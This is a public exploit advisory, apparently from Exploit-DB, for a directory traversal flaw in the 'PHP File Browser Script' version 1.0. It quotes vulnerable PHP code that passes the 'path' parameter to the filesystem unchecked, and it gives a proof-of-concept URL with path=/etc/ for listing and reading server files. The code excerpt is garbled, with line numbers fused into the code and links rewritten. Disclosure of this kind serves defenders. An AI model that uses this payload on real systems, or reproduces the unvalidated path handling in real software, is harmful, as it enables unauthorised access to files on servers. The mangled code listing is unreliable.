# Exploit Title: PHP File Browser Script 1 - Directory Traversal
# Dork: N/A
# Date: 2018-09-03
# Exploit Author: Özkan Mustafa Akkuş (AkkuS)
# Vendor Homepage: https://www.hscripts.com/scripts/php/file-browser.php
# Software Link: https://www.hscripts.com/scripts/php/downloads/file-browser-demo.zip
# Version: 1.0
# Category: Webapps
# Tested on: Kali Linux
# Description: "index.php" is vulnerable to directory traversal because the `path` request parameter (line 73 below) is used as a filesystem path without any validation.
# An attacker can list and read any file or directory whose name is known.
# Vulnerable File: index.php
<?php // line 4572$script = basename(__FILE__);// the name of this script
73$path = !empty($_REQUEST['path']) ? $_REQUEST['path']:"demo";// the path the script should access
75if($loc!=''){
76echo "<p id='bloc'><b>Browsing Location: </b><a href='https://www.exploit-db.com/exploits/45327/index.php'><b>".ucfirst($loc1)."</b></a>77<a href='https://www.exploit-db.com/exploits/45327/$script?path=$rpath/$loc1/$loc2'><b>".ucfirst($locdem2)."</b></a>78<a href='https://www.exploit-db.com/exploits/45327/'><b>".ucfirst($locdem3)."</b></a></p>";}
79else{
80echo "<p id='bloc'><b>Browsing Location: </b><a href='https://www.exploit-db.com/exploits/45327/'><b>Demo</b></a></p>";
?>// line 151
# PoC :
https://Target/scripts/php/file-browser-demo/index.php?path=[DirectoryName]
# Replace [DirectoryName] with a known directory name.
# Example: '/etc/' or '/var/www/'
# https://Target/scripts/php/file-browser-demo/index.php?path=/etc/